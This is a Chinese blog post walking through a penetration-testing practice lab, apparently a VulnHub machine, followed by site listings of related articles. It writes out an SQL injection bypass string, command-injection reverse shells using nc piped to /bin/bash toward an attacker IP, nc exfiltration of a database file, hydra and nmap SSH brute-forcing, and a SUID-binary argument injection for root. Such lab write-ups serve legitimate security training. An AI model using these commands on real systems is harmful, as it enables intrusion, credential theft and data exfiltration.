【安全牛】一起来打靶第二周

最新推荐文章于 2024-06-11 08:49:57 发布
最新推荐文章于 2024-06-11 08:49:57 发布
阅读量234 收藏
点赞数 2
文章标签: 安全 ssh web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47356348/article/details/125271322
版权

【安全牛】一起来打靶第二周

  1. 扫描主机开放端口、扫描主机开放端口的服务
    在这里插入图片描述
    可知8080端口开放http服务,而且是用werkzeug框架
  2. 打开8080端口
    在这里插入图片描述
    是一个邀请码验证界面,通过测试发现存在sql注入漏洞。
  3. 通过sql注入,进入下一个界面。1” or 1=1 --+
    在这里插入图片描述
    是一个命令执行漏洞,用管道符连接
  4. 使用nc命令反弹
    nc -e 10.106.0.20 5555 失败,因为一些版本不支持-e参数
    于是,
    nc 10.106.0.20 4444 | /bin/bash | nc 10.106.0.20 5555
    在这里插入图片描述
    连接成功!
  5. 查看database.sql文件,需要下载到kali查看。
    nc传输
    kali:nc -nvlp 6666 > db.sql 传输到db.sql中
    靶机: nc 10.106.0.20 6666 < database.sql
    在这里插入图片描述
    查看db.sql文件
    sqlite3 进入软件
    .open db.sql 没报错就成功打开了db.sql文件
    .database 进入数据库
    .dump 打印数据
    ctrl+z 退出
    在这里插入图片描述
    可以看到有很多条“password”,猜测是目标主机密码,于是进行ssh爆破。
  6. ssh爆破
    收集上面的密码,成为“pwd.txt”字典
    寻找/etc/passwd 文件中 有开放ssh的用户
    cat /etc/passwd | grep /bin/bash
    查询的结果放入user.txt中
    进行爆破:
    hydra -L user.txt -P pwd.txt ssh:10.106.0.127
    nmap爆破
    nmap -p 22 --script=ssh-brute --script-args userdb=user.txt,passdb=pwd.txt 10.106.0.127
    没有爆破出结果。
    换个思路。
  7. 查看文件,有两个文件,updata_cloudav.c 具有写的权限。updata_cloudav具有root权限。
    在这里插入图片描述
    于是用来提权。
    经过分析,发现updata_cloudav需要一个参数,于是可以:
    ./update_cloudav “a | nc 10.106.0.20 7777 | /bin/bash | nc 10.106.0.20 8888”
    成功提权!
    在这里插入图片描述
    结束!
Day_0713
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安全学习笔记】Kali Linux渗透测试方法
edu_aqniu的博客
11-09 2355
1.安全问题的根源 ①由于分层思想,导致每个层次的相关人员都只关心自己层次的工作,因此每个人认识系统都是片面的,而安全是全方位的,整体的,所以造成安全问题。 ②技术人员追求效率,导致只追求功能实现,而很容易忽略安全性的工作 ③由于人都是会犯错误的,因此最大的安全威胁是人,所以无法避免安全隐患,但可以降低安全风险 软件安全生命周期: 需求——>设计——>编码——>测试—
scratch2源码第二十一课鼠标打靶练习
05-30
scratch2源码第二十一课鼠标打靶练习提取方式是百度网盘分享地址
安全】一起来打靶第一周笔记
jiji_king的博客
06-13 434
安全课堂】红队渗透一起来打靶第一周
攻防演练 | 苑老师喊你一起来打靶
weixin_60428659的博客
08-23 1074
很多网络安全专业的在校生或是渗透测试爱好者,都面临着一个共同的难题,花费了大量的时间和精力在学习网络安全技术,当实际面对一个需要渗透/攻击的系统时,却无从下手。 渗透是一项讲求实战的技能。不同于书本知识,实战技能必须通过实战训练才能更好的掌握。但未授权的渗透测试攻击触犯法律,完全的纸上谈兵又很难练出能力! 那么该如何进行实操训练呢? 关于这个问题,@苑房弘老师给出的解决办法就是:打靶! 靶场、靶机包含从现实世界中发现的漏洞类型,正是磨练手感、提高攻击技能的上佳之选。只有这样,日后面对真实的渗透
0x02-easy_cloudantivirus
rec09er的博客
04-12 995
靶机介绍:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 靶机下载地址:https://download.vulnhub.com/boredhackerblog/easy_cloudantivirus.ova 通关目标:取得目标靶机的root权限 攻击机:kali(10.0.2.10) 目标靶机:easy_cloudantivirus(10.0.2.13) 涉及攻击方法:  ● 主机发现  ● 端口扫描  ● 目录扫描  ● SQL注入
安全学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1587
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
scratch2源码第20讲-打靶
05-30
scratch2源码第20讲-打靶提取方式是百度网盘分享地址
第二十一课鼠标打靶练习-少儿编程scratch项目源代码文件案例素材.zip
11-07
第二十一课鼠标打靶练习-少儿编程scratch项目源代码文件案例素材.zip
C语言——飞机打靶游戏
04-15
本代码用C语言撰写,可以使用dev C++等编译器运行。可以使用键盘'a'、's'、'd'、'w' 键进行上下左右移动飞机模型,按空格键发射子弹,击中靶子,系统会自动重新生成靶子,按'q'键结束游戏,显示击中靶子次数。
基于c#语言的打靶程序
11-20
本程序完成了常见的打靶游戏,采用了c#语言编写,初学者可以利用他学习c#语言,也可以测试这个游戏,娱乐和学习两不误。
安全学习笔记】提权
edu_aqniu的博客
10-30 2086
Windows • user • Administrator • System Linux • User • Root windows提权 将admin提权为system net user命令  查看账户 Guest 用户,权限很小 HelpAssistant 用户,远程协助账号 Windows system账号 • 系
安全--kali学习笔记
weixin_30362801的博客
05-05 315
正式开始学习安全的kali教程,先学习了几个工具,nc ,ncat ,wireshark,接下来还要学习tcpdump,学完后再进行工具的总结。 转载于:https://www.cnblogs.com/neoxblog/p/8996101.html...
Evilbox-One靶机打靶过程与思路
qq_52610024的博客
04-21 2524
没有有效信息,思考是否可能有写入权限,php//filter/write=convert.base64-decode/resource=test.php&txt=MTIz。-wval.txtVAL-uhttp//10.0.2.26/secret/evil.php?/home/mowree/.ssh/id_rsa。查找suid文件权限find/-perm/40002>/dev/null4000是suid权限位置,后面是将报错文件放置到空白目录中。/etc/passswd。...
起来打靶-第六周
m0_53323980的博客
04-25 491
第六周
hacksudo靶机打靶过程及思路
qq_52610024的博客
05-03 968
3.注释里面有一个cgi-bin可以使用外部应用程序,此时通擦汗那个会存在一个cgi-bin的文件夹。sudocat/etc/shadow发现可以查看密码文件,但是需要考虑到可能破解需要很多的时间。执行脚本sudo-uthor/home/thor/./hammer.sh。发现第二个问题时可以执行输入的系统指令输入bash得到thor的shell。4.查看所有的后缀名为cgi,sh的文件,使用破壳漏洞尝试控制系统。sudo-l发现thor目录下有一个可以执行的shell脚本。...
打靶日记--xss
weixin_55821558的博客
03-09 6686
很基础的一个靶场 同一关卡 过关方式很多 欢迎大家留言给出宝贵意见
doubletrouble靶机打靶过程及思路
qq_52610024的博客
05-10 547
4.searchsploitqdpm9.1发现存在rce漏洞需要登录使用,使用默认密码进行登录,但。9.使用ssh进行登录目标系统账号密码,尝试用第二个账号密码登录ssh时发现成功,先进行万能密码测试’or1=1#失败,查看源码也没有收获,再次进行路径爬取。但是也没有得到有效的信息,使用bp抓包放回包,使用时间盲注得到不一样的注入。执行成功上传了一个后门文件,使用nc反弹shell成功,升级shell后。将数据包保存下来,使用sqlmap进行注入成功,使用得到的账号密码均失败。...
等保测评和安全运维
weixin_64392888的博客
06-11 654
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
《软件定义安全》之六:SDN和NFV安全实践
最新发布
大龄IT民工
06-11 1411
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
upload打靶第四关
01-11
根据引用内容,上传打靶第四关的目标是通过修改文件名进行绕过。以下是一种可能的解决方法: 1. 打开Burp Suite并配置代理。确保Burp Suite正在监听您的浏览器流量。 2. 登录到Upload-labs靶场,并导航到第四关。 3...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值